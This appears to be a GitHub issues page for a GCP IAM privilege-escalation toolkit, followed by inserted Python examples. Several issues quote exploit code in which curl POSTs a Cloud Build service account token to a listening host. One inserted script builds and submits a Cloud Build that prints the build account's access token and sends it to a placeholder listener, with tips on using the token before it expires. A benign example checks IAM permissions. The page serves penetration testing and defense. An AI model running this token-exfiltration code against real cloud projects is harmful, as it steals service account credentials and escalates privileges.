rhinosecuritylabs / gcp-iam-privilege-escalation
A collection of GCP IAM privilege escalation methods documented by the Rhino Security Labs team.
License: BSD 3-Clause "New" or "Revised" License
We can't get the Cloud Build service account token with this Python code.
Issue Python file:
https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py
Because /root/tokencache/gsutil_token_cache is no longer available in my environment.
Issue code:
    if args.listening_host:
        command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.listening_host}")'
    else:
        command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.ip_port}")'
So I suggest changing the build container to gcr.io/cloud-builders/gcloud and the command to one that gets the access_token.
Suggested code:
    if args.listening_host:
        command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.listening_host}")'
    else:
        command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.ip_port}")'
I will open a pull request for this issue.
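The Cloud Build request that the suggestion above amounts to, written out as an added example (this is not the repository's cloudbuild.builds.create.py, nor the reporter's pull request): a single build step in the gcr.io/cloud-builders/gcloud image that runs gcloud auth print-access-token and POSTs the result to a listener. The listener URL and project ID are placeholders, and the example assumes bash and curl are available in that builder image.

```python
"""Added example, not code from the original project: construct and submit a
Cloud Build whose only step prints the build service account's access token
and POSTs it to a listener controlled by the tester.

Assumptions (not from the page): the listener URL and project ID below are
placeholders, and the gcr.io/cloud-builders/gcloud image provides bash and curl.
"""
import json

GCLOUD_BUILDER = "gcr.io/cloud-builders/gcloud"


def exfil_command(listener_url):
    """Shell command run inside the build step.

    The step executes as the build's service account, so the token printed by
    gcloud is that account's token, not the caller's.
    """
    return (
        "gcloud auth print-access-token > /tmp/token.txt && "
        f"curl -s -X POST --data-binary @/tmp/token.txt {listener_url}"
    )


def build_request_body(listener_url):
    """Body for projects.builds.create: one step, with entrypoint overridden to
    bash so the image's default gcloud entrypoint does not swallow the command."""
    return {
        "steps": [
            {
                "name": GCLOUD_BUILDER,
                "entrypoint": "bash",
                "args": ["-c", exfil_command(listener_url)],
            }
        ]
    }


def create_build(project_id, listener_url):
    """Submit the build. Requires google-api-python-client and application
    default credentials holding cloudbuild.builds.create on the project;
    imported lazily so the helpers above run offline."""
    from googleapiclient import discovery

    service = discovery.build("cloudbuild", "v1")
    return (
        service.projects()
        .builds()
        .create(projectId=project_id, body=build_request_body(listener_url))
        .execute()
    )


if __name__ == "__main__":
    # Placeholder listener on a documentation-range address (constructed).
    print(json.dumps(build_request_body("http://203.0.113.10:8000/"), indent=2))
```

Whoever runs the listener should expect a raw bearer token in the POST body; the token is short-lived, so whatever follows (for example a generateAccessToken call against another service account) needs to happen before it expires.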
Hello,
Just to let you know that you made a small typo in one of your exploit scripts:
    res = service.projects().serviceAccounts().generateAccessToken(name=f'projects/-/serviceAccounts/{svc_acccount["email"]}', body=body).execute()
on line 38. It should be:
    res = service.projects().serviceAccounts().generateAccessToken(name=f'projects/-/serviceAccounts/{svc_account["email"]}', body=body).execute()
Nothing bad.
Have a nice day.
What are the required permissions to use the enumerate_member_permissions.py script?
It looks like you need at least:
- resourcemanager.projects.get, to use projects.getAncestry
- resourcemanager.projects.getIamPolicy, to use projects.getIamPolicy
- resourcemanager.folders.getIamPolicy, to use folders().getIamPolicy
- resourcemanager.organizations.getIamPolicy, to use organizations.getIamPolicy
How would you suggest going about creating an OAuth2 token, which many of these scripts ask for?
Thanks.
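An added example covering both of the preceding questions (the permission list and the OAuth2 token); it is not code from the repository and not a maintainer's answer. It obtains an access token from application default credentials with the google-auth library, and checks the two project-level permissions from the reply above with projects.testIamPermissions before the enumeration script is run. The folder and organization getIamPolicy permissions are tested against those resources, not the project, so they are left out of the project check. The project ID and the sample API response are placeholders constructed for the example.

```python
"""Added example, not part of the original project: get an OAuth2 access token
from application default credentials, and verify the project-level permissions
named in the reply above via projects.testIamPermissions.

Assumptions (not from the page): the project ID is a placeholder and
SAMPLE_RESPONSE is a constructed testIamPermissions reply.
"""

# Project-level permissions from the reply. The folder/organization
# getIamPolicy permissions must be tested with folders.testIamPermissions /
# organizations.testIamPermissions against those resources instead.
REQUIRED_PROJECT_PERMISSIONS = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.getIamPolicy",
]

CLOUD_PLATFORM_SCOPE = "https://www.googleapis.com/auth/cloud-platform"


def missing_permissions(required, test_response):
    """Return the entries of `required` that testIamPermissions did not grant.

    `test_response` is the API reply body, {"permissions": [...granted...]};
    the key is omitted entirely when nothing was granted.
    """
    granted = set(test_response.get("permissions", []))
    return [perm for perm in required if perm not in granted]


def get_access_token():
    """OAuth2 bearer token from application default credentials
    (gcloud auth application-default login, GOOGLE_APPLICATION_CREDENTIALS,
    or an attached service account). Imported lazily so the pure helper above
    runs without google-auth installed."""
    import google.auth
    import google.auth.transport.requests

    creds, _project = google.auth.default(scopes=[CLOUD_PLATFORM_SCOPE])
    creds.refresh(google.auth.transport.requests.Request())
    return creds.token


def check_project(project_id):
    """Ask Resource Manager which of the required permissions the caller has
    on `project_id`; returns the missing ones (empty list means go ahead)."""
    from googleapiclient import discovery

    crm = discovery.build("cloudresourcemanager", "v1")
    resp = (
        crm.projects()
        .testIamPermissions(
            resource=project_id,
            body={"permissions": REQUIRED_PROJECT_PERMISSIONS},
        )
        .execute()
    )
    return missing_permissions(REQUIRED_PROJECT_PERMISSIONS, resp)


# Constructed sample reply: the caller can read the project but not its policy.
SAMPLE_RESPONSE = {"permissions": ["resourcemanager.projects.get"]}


if __name__ == "__main__":
    print("missing:", missing_permissions(REQUIRED_PROJECT_PERMISSIONS, SAMPLE_RESPONSE))
```

Outside the example, the equivalent one-liner for the token is `gcloud auth print-access-token`, which is what the enumeration and exploit scripts typically consume; testIamPermissions itself needs no special permission beyond being able to address the project, which is why it is a safe first call.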
Thanks for the repo, it's very helpful as a defender putting together policies.
I think there are a couple of issues with the API keys route included in this tool and mentioned in the post.
My understanding is that API keys don't grant you access to any non-public resource; they just allow you to make API requests that are billed to a project and are identified as coming from a particular source application (ref: https://cloud.google.com/docs/authentication#applications):
"Most Google Cloud APIs also support anonymous access to public data using API keys. However, API keys only identify the application, not the principal. When using API keys, the principal must be authenticated by other means."
I think any user that already has some permissions on a project already has more privileges than what is granted by an API key?
Separately, the detector has the permission names wrong: serviceusage.apiKeys.{create,list} don't exist, it's apikeys.keys... instead.
EDIT: Removed :)